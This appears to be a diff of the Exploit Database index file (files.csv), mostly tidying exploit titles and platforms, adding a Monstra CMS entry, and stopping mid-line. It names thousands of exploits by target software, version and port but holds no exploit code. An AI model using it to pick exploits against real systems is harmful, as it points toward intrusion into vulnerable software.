diff --git a/files.csv b/files.csv index 6db9bd45d..834f67c62 100755 --- a/files.csv +++ b/files.csv @@ -354,7 +354,7 @@ id,file,description,date,author,platform,type,port 378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac Remote Arbitrary Code Execution Exploit",2004-08-06,N/A,linux,remote,0 380,platforms/linux/remote/380.c,"Pavuk Digest Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 -381,platforms/windows/local/381.c,"Serv-U 3x - 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0 +381,platforms/windows/local/381.c,"Serv-U 3.x - 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow Exploit",2002-12-24,innerphobia,linux,remote,0 383,platforms/multiple/dos/383.c,"psyBNC <= 2.3 - Denial of Service Exploit",2002-05-19,"Lunar Fault",multiple,dos,31337 384,platforms/php/webapps/384.txt,"PHP (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 @@ -652,7 +652,7 @@ id,file,description,date,author,platform,type,port 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP Unauthorized _USER_ Remote BoF Exploit",2005-02-18,class101,windows,remote,21 828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617 829,platforms/hardware/remote/829.c,"Thomson TCW690 POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80 -830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 File Request Format String Remote Exploit (win)",2005-02-19,mandragore,windows,remote,8000 +830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 - File Request Format String Remote Exploit (Windows)",2005-02-19,mandragore,windows,remote,8000 831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit",2005-02-20,jsk,linux,remote,5803 832,platforms/php/webapps/832.txt,"vBulletin <= 3.0.6 php Code Injection",2005-02-22,pokley,php,webapps,0 833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 @@ -3064,6 +3064,7 @@ id,file,description,date,author,platform,type,port 3395,platforms/windows/remote/3395.c,"WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC",2007-03-01,cybermind,windows,remote,0 3396,platforms/linux/dos/3396.php,"PHP <= 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC",2007-03-02,"Stefan Esser",linux,dos,0 3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent <= 2.37 (APPEND) Remote Buffer Overflow Exploit",2007-03-02,mu-b,windows,remote,143 +39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80 3398,platforms/php/webapps/3398.txt,"Mani Stats Reader <= 1.2 (ipath) Remote File Include Vulnerability",2007-03-02,mozi,php,webapps,0 3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String Exploit",2007-03-02,"Luigi Auriemma",windows,dos,0 3400,platforms/php/webapps/3400.pl,"webSPELL <= 4.01.02 - Multiple Remote SQL Injection Exploit",2007-03-02,DNX,php,webapps,0 @@ -3183,8 +3184,8 @@ id,file,description,date,author,platform,type,port 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion Exploit",2007-03-19,GoLd_M,php,webapps,0 3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability",2007-03-19,"Mehmet Ince",php,webapps,0 3520,platforms/asp/webapps/3520.txt,"NetVios Portal (page.asp) Remote SQL Injection Vulnerability",2007-03-19,parad0x,asp,webapps,0 -3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (win)",2007-03-19,bd0rk,php,webapps,0 -3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (win)",2007-03-20,GoLd_M,php,webapps,0 +3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0 +3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln",2007-03-20,"Cold Zero",php,webapps,0 3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0 @@ -5313,7 +5314,7 @@ id,file,description,date,author,platform,type,port 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0 5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0 -5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0 +5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (Windows)",2008-05-29,gmda,php,webapps,0 5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0 5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0 @@ -6451,7 +6452,7 @@ id,file,description,date,author,platform,type,port 6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability",2008-10-31,ZoRLu,php,webapps,0 6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (beta) Insecure Cookie Handling Vulnerability",2008-10-31,ZoRLu,php,webapps,0 6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b Remote File Inclusion Vulnerability",2008-10-31,w0cker,php,webapps,0 -6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a - Local File Inclusion Vulnerability (win)",2008-10-31,GoLd_M,php,webapps,0 +6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a - Local File Inclusion Vulnerability (Windows)",2008-10-31,GoLd_M,php,webapps,0 6889,platforms/php/webapps/6889.txt,"Absolute Content Rotator 6.0 Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0 6890,platforms/php/webapps/6890.txt,"Absolute Banner Manager Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0 6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0 @@ -6810,7 +6811,7 @@ id,file,description,date,author,platform,type,port 7261,platforms/php/webapps/7261.txt,"Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability",2008-11-28,"CWH Underground",php,webapps,0 7262,platforms/windows/dos/7262.pl,"Microsoft Office Communicator (SIP) Remote Denial of Service Exploit",2008-11-28,"Praveen Darshanam",windows,dos,0 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability",2008-11-28,MrDoug,php,webapps,0 -7264,platforms/windows/local/7264.txt,"Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (win)",2008-11-28,Abysssec,windows,local,0 +7264,platforms/windows/local/7264.txt,"Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (Windows)",2008-11-28,Abysssec,windows,local,0 7265,platforms/php/webapps/7265.txt,"web calendar system <= 3.40 (xss/SQL) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 7266,platforms/php/webapps/7266.pl,"All Club CMS <= 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability",2008-11-28,JIKO,php,webapps,0 @@ -7470,7 +7471,7 @@ id,file,description,date,author,platform,type,port 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC",2009-01-30,waraxe,windows,remote,0 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 (rfi/XSS) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC",2009-02-02,"Alfons Luja",php,webapps,0 -7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 - Local File Inclusion Vulnerabilities (win)",2009-02-02,ahmadbady,php,webapps,0 +7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 - Local File Inclusion Vulnerabilities (Windows)",2009-02-02,ahmadbady,php,webapps,0 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0 7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0 7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0 @@ -7607,7 +7608,7 @@ id,file,description,date,author,platform,type,port 8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 -8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0 +8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0 8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 @@ -7848,7 +7849,7 @@ id,file,description,date,author,platform,type,port 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) PoC",2009-04-01,"fl0 fl0w",windows,dos,0 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit",2009-04-01,"Guido Landi",windows,remote,0 8337,platforms/multiple/dos/8337.c,"XBMC 8.10 (GET Requests) Multiple Remote Buffer Overflow PoC",2009-04-01,n00b,multiple,dos,0 -8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Get Request) Remote Buffer Overflow Exploit (win)",2009-04-01,n00b,windows,remote,80 +8338,platforms/windows/remote/8338.py,"XBMC 8.10 - (GET Request) Remote Buffer Overflow Exploit (Windows)",2009-04-01,n00b,windows,remote,80 8339,platforms/windows/remote/8339.py,"XBMC 8.10 (takescreenshot) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80 8340,platforms/windows/remote/8340.py,"XBMC 8.10 (get tag from file name) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability",2009-04-01,cOndemned,php,webapps,0 @@ -7935,7 +7936,7 @@ id,file,description,date,author,platform,type,port 8425,platforms/php/webapps/8425.txt,"php-revista 1.1.2 (rfi/sqli/cb/XSS) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder - (.m3u) Universal Stack Overflow Exploit",2009-04-14,AlpHaNiX,windows,local,0 8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0 -8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)",2009-04-14,e.wiZz!,windows,remote,0 +8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 - Webserver Directory Traversal Vulnerability (Windows)",2009-04-14,e.wiZz!,windows,remote,0 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b Remote Denial of Service Exploit",2009-04-14,ksa04,multiple,dos,0 8430,platforms/openbsd/dos/8430.py,"OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit",2009-04-14,nonroot,openbsd,dos,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability",2009-04-14,SirGod,php,webapps,0 @@ -8427,7 +8428,7 @@ id,file,description,date,author,platform,type,port 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability",2009-06-11,Br0ly,php,webapps,0 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 (xss/SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0 8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0 -8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0 +8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (Windows)",2009-06-12,ryujin,windows,remote,0 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0 8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0 8937,platforms/php/webapps/8937.txt,"campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 @@ -8679,14 +8680,14 @@ id,file,description,date,author,platform,type,port 9195,platforms/php/webapps/9195.txt,"radlance gold 7.5 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9196,platforms/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 -9199,platforms/windows/local/9199.txt,"Adobe Related Service - (getPlus_HelperSvc.exe) Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 +9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - (.mpl/.m3u) Local Heap Overflow PoC",2009-07-20,hack4love,windows,dos,0 9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln",2009-07-20,Bgh7,php,webapps,0 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass Vulnerability",2009-07-20,Mr.tro0oqy,php,webapps,0 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 (sql/xss/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0 -9207,platforms/windows/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,N/A,windows,local,0 +9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,N/A,linux,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio setuid - Local Privilege Escalation Vulnerability (Ubuntu 9.04 & Slackware 12.2.0)",2009-07-20,N/A,linux,local,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT (httpd service) Remote Command Execution Vulnerability",2009-07-20,gat3way,hardware,remote,0 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0 @@ -8700,7 +8701,7 @@ id,file,description,date,author,platform,type,port 9220,platforms/windows/dos/9220.pl,"KMplayer <= 2.9.4.1433 - (.srt) Local Buffer Overflow PoC",2009-07-20,b3hz4d,windows,dos,0 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0 9222,platforms/windows/dos/9222.cpp,"FlyHelp - (.CHM) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0 -9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 - NOS Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0 +9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (C)",2009-07-21,"Jeremy Brown",windows,local,0 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection Vulnerability",2009-07-21,n3w7u,php,webapps,0 9226,platforms/php/webapps/9226.txt,"phpdirectorysource (xss/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 @@ -8746,7 +8747,7 @@ id,file,description,date,author,platform,type,port 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0 9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL Injection Vulnerability",2009-07-27,boom3rang,php,webapps,0 -9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 - NOS Local Privilege Escalation Exploit (py)",2009-07-27,Dr_IDE,windows,local,0 +9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (Python)",2009-07-27,Dr_IDE,windows,local,0 9273,platforms/php/webapps/9273.php,"Allomani Mobile 2.5 - Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 9274,platforms/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 - Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 9275,platforms/php/webapps/9275.php,"Allomani Movies & Clips 2.7.0 - Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 @@ -9192,7 +9193,7 @@ id,file,description,date,author,platform,type,port 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 -9800,platforms/windows/remote/9800.cpp,"Serv-u Web client 9.0.0.5 - Buffer Overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80 +9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion Vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0 @@ -9343,7 +9344,7 @@ id,file,description,date,author,platform,type,port 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 store() SQL injection",2009-10-26,bookoo,php,webapps,0 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma post.php SQL injection",2009-10-26,bookoo,php,webapps,0 -9966,platforms/windows/remote/9966.txt,"Serv-u Web client 9.0.0.5 - Buffer Overflow",2009-11-02,"Nikolas Rangos",windows,remote,80 +9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0 @@ -10373,7 +10374,7 @@ id,file,description,date,author,platform,type,port 11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (password field) Universal BoF Exploit",2010-02-02,mr_me,windows,local,0 11315,platforms/windows/local/11315.c,"Deepburner pro 1.9.0.228 dbr file Buffer Overflow Exploit (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 11316,platforms/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services",2010-02-02,R3VAN_BASTARD,php,webapps,0 -11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard breg device drivers Privilege Escalation Vulnerability",2010-02-02,anonymous,windows,local,0 +11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation Vulnerability",2010-02-02,anonymous,windows,local,0 11318,platforms/php/webapps/11318.txt,"Dlili Script SQL Injection Vulnerability",2010-02-02,Dr.DaShEr,php,webapps,0 11319,platforms/php/webapps/11319.txt,"MYRE Classified (cat) SQL Injection Vulnerability",2010-02-02,kaMtiEz,php,webapps,0 11320,platforms/windows/dos/11320.pl,"Digital Amp MP3 3.1 - (.Mp3) Local Crash PoC",2010-02-02,SkuLL-HackeR,windows,dos,0 @@ -12298,7 +12299,7 @@ id,file,description,date,author,platform,type,port 13955,platforms/php/webapps/13955.txt,"Joomla Template BizWeb com_community Persistent XSS Vulnerability",2010-06-21,Sid3^effects,php,webapps,0 13956,platforms/php/webapps/13956.txt,"Joomla Hot Property com_jomestate RFI Vulnerability",2010-06-21,Sid3^effects,php,webapps,0 13957,platforms/php/webapps/13957.txt,"myUPB <= 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0 -13958,platforms/windows/dos/13958.txt,"Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 +13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 - (SFTP Module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"teamspeak <= 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS Vulnerability",2010-07-14,Sid3^effects,php,webapps,0 14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 @@ -13092,7 +13093,7 @@ id,file,description,date,author,platform,type,port 15011,platforms/php/webapps/15011.txt,"php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 -15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0 +15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0 36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,java,webapps,0 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 @@ -13824,7 +13825,7 @@ id,file,description,date,author,platform,type,port 15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0 15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0 -15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 +15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 @@ -14165,7 +14166,7 @@ id,file,description,date,author,platform,type,port 16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,metasploit,windows,remote,0 16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,metasploit,windows,remote,0 16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service - Impersonation Vulnerability (MS10-061)",2011-02-17,metasploit,windows,remote,0 -16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,metasploit,windows,remote,0 +16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,metasploit,windows,remote,0 16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0 16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,metasploit,windows,remote,0 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service Overflow",2010-08-30,metasploit,windows,dos,0 @@ -14976,7 +14977,7 @@ id,file,description,date,author,platform,type,port 17204,platforms/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 - Local File Disclosure",2011-04-22,Mbah_Semar,php,webapps,0 17205,platforms/php/webapps/17205.txt,"4images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injection Vulnerabilities",2011-04-22,^Xecuti0N3r,php,webapps,0 -17207,platforms/php/webapps/17207.txt,"WordPress Plugin ajax category dropdown 0.1.5 - Multiple 